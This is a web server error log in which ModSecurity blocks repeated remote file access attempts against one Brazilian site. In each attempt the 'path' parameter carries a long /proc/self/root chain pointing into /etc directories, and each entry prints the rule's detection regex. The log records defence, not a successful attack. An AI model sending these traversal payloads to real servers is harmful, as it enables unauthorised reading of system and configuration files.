[Tue Mar 17 20:53:24.280274 2026] [:error] [pid 6296:tid 140411699963648] [client 74.7.241.31:55060] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpdHIk7brgkOH-rIWzCgAAAUU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:53:26.929617 2026] [:error] [pid 11088:tid 140411691570944] [client 74.7.241.31:55062] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpdWmqtCojLHvu5cKPjAAAAIY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:53:29.038092 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.241.31:53414] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpeeyqAr6etmhZHNpNQwAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:53:30.675462 2026] [:error] [pid 25836:tid 140411582465792] [client 74.7.241.31:53426] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpeoh-PF_25v4hFRCRTwAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:53:32.127219 2026] [:error] [pid 29151:tid 140411632822016] [client 74.7.241.31:53432] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpfPPqhzTj3BvfDX-vRgAAAc0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:53:33.494459 2026] [:error] [pid 29151:tid 140411624429312] [client 74.7.241.31:53444] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpffPqhzTj3BvfDX-vSQAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:53:34.109842 2026] [proxy_fcgi:error] [pid 31803:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:45040] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:53:34.819499 2026] [:error] [pid 29151:tid 140411733534464] [client 74.7.241.31:53446] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpfvPqhzTj3BvfDX-vSgAAAcE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:53:36.143791 2026] [:error] [pid 29151:tid 140411649607424] [client 74.7.241.31:53456] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpgPPqhzTj3BvfDX-vTgAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:53:41.343537 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.241.31:36786] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpheyqAr6etmhZHNpNWAAAAEA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:53:43.238032 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.241.31:36796] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnph-yqAr6etmhZHNpNWwAAAE8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:53:56.161206 2026] [proxy_fcgi:error] [pid 31803:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:45364] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:53:58.322295 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.241.31:50114] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpluyqAr6etmhZHNpNZwAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:54:00.735595 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.241.31:50128] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpmOyqAr6etmhZHNpNbAAAAFE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:54:02.790459 2026] [:error] [pid 11088:tid 140411582465792] [client 74.7.241.31:50140] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpmmmqtCojLHvu5cKPlQAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:54:04.376070 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.241.31:50150] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpnNa6ubjKNq_cu4YtKAAAA0M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:54:17.124179 2026] [proxy_fcgi:error] [pid 31803:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:45656] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:54:18.569072 2026] [:error] [pid 25836:tid 140411540502272] [client 74.7.241.31:57696] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpqoh-PF_25v4hFRCRdwAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:54:20.318389 2026] [:error] [pid 11816:tid 140411557287680] [client 74.7.241.31:57698] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnprOw_le52K8_3pV1zagAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:54:21.833965 2026] [:error] [pid 11816:tid 140411565680384] [client 74.7.241.31:57714] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnprew_le52K8_3pV1zbAAAAhU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:54:23.344427 2026] [:error] [pid 25836:tid 140411649607424] [client 74.7.241.31:57728] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpr4h-PF_25v4hFRCRewAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:54:24.767662 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.241.31:57738] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpsOyqAr6etmhZHNpNdgAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:54:26.250953 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.241.31:57744] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpssdf6f5d65gmYZRjLAAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:54:39.141809 2026] [proxy_fcgi:error] [pid 31803:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:46016] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:54:40.454841 2026] [:error] [pid 11816:tid 140411582465792] [client 74.7.241.31:56614] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpwOw_le52K8_3pV1zbwAAAhM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:54:40.706651 2026] [:error] [pid 11816:tid 140411666392832] [client 74.7.241.31:56614] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpwOw_le52K8_3pV1zcAAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
